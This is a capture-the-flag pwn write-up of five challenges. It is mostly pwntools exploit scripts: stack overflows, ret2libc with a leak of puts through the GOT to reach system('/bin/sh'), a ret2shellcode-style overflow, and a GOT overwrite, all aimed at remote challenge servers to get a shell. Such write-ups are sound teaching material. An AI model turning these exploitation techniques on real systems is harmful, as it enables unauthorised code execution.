PWN1
from pwn import *
context(log_level='debug')
# io = process('./pwn')
io = remote('node4j.buuoj.cn',29139)
offset = 32+8
padding = b'A'
vuln_addr = 0x400708
pop_rdi = 0x4007d3
# basic overflow
payload = padding*offset + p64(vuln_addr)
io.sendlineafter("?\n",payload)
io.interactive()PWN2 calc
basic python script programming.
from pwn import *
context(log_level='debug')
def calc(a,b,operator):
ans = 0
if(operator == "+"):
ans = a + b
elif(operator == "-"):
ans = a - b
elif(operator == "x"):
ans = a * b
else:
ans = a / b
return str(ans).encode()
# o = process('./calc')
io = remote('node4.buuoj.cn',29226)
io.recvline()
io.recvline()
io.recvline()
for i in range(100):
str_val = io.recvuntil(" = what?\n")
str_list = str_val.split()
a = int(str_list[3].decode())
b = int(str_list[5].decode())
operator = str_list[4].decode()
val = calc(a,b,operator)
io.sendline(val)
io.recvline()
io.interactive()PWN3 ret2libc
Replace the env
patchelf --replace-needed libc.so.6 ./libc-2.31.so ./pwn
patchelf --set-interpreter ./ld-2.31.so ./pwnfrom pwn import *
io = process(['/home/kali/Desktop/new_star/pwn2/ld-2.31.so','./pwn'],env={"LD_PRELOAD":'/home/kali/Desktop/new_star/pwn2/libc-2.31.so'})
elf = ELF('./pwn')
# io = remote('node4.buuoj.cn',25158)
libc = ELF('./libc-2.31.so')
context(arch = elf.arch, os = 'linux',log_level = 'debug')
offset = 40
padding = b'A'
main_addr = 0x400698
pop_rdi = 0x400753
ret_addr = 0x40050e
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# gdb.attach(io,'b *0x400530')
payload = padding * offset+ p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
sleep(0.5)
io.sendline(payload)
offset = u64(io.recvuntil('\x7f')[-6:].ljust(0x8,b'\x00'))
print(hex(offset))
libc_base = offset - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
str_bin_sh = libc_base + next(libc.search(b'/bin/sh'))
print(hex(system_addr))
print(hex(str_bin_sh))
sleep(0.5)
payload1 = offset*padding + p64(ret_addr) + p64(pop_rdi) + p64(str_bin_sh) + p64(system_addr) + padding*8
# payload1 = flat([padding*offset, ret_addr, pop_rdi,str_bin_sh,system_addr, 0xdeadbeef])
sleep(1)
# io.sendlineafter("time?\n",payload1)
io.interactive()
PWN4 ret2shellcode
Ezez..
from pwn import *
# io = process('./pwn4')
io = remote('node4.buuoj.cn', 27632)
padding = 'I'
offset = 20
addr = 0x08048f13
payload = flat([padding*offset, b'a'*4, addr])
io.sendline(payload)
io.interactive()PWN5
patchelf --replace-needed libc.so.6 ./libc-2.31.so ./pwn
patchelf --set-interpreter ./ld-2.31.so ./pwnLeak the puts function address.
If we change puts function to system function, and we can getshell.
What should we do? What operations we can take?
- In the scanf function, we have to pass the address.
- We can read something in buf
Let’s organize ideas
- leaking the puts address -> according to libc -> find the system adress and /bin/sh address
- change the put_got address
- when system call puts function -> put_got address -> real put function address
So we can change the real put function address by the read function.
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
# io= process('pwn5')
io = remote('node4.buuoj.cn',27112)
elf = ELF('pwn5')
libc = ELF('./libc-2.31.so')
io.recvline()
puts_got = elf.got['puts']
puts_addr = io.recvuntil(b"\n")
puts_addr = int(puts_addr.decode().strip('\n'),16)
info("PUTS_GOT == %s " %hex(puts_got))
info("PUTS_GOT_ORIGINAL == %s" %p64(puts_got))
info("PUTS_ADDR == %s " %hex(puts_addr))
libc_base = puts_addr - libc.sym.puts
system_addr = libc_base + libc.sym.system
info("libc == %s" %libc)
info("libc_base == %s" %hex(libc_base))
info("system_addr == %s" %hex(system_addr))
payload = p64(system_addr)
io.sendline(hex(puts_got))
io.sendlineafter("now input your content:\n",payload)
io.interactive()
PWN5 Reference
https://blog.csdn.net/xiangbaohui/article/details/122547009
https://blog.csdn.net/qq_52126646/article/details/119494939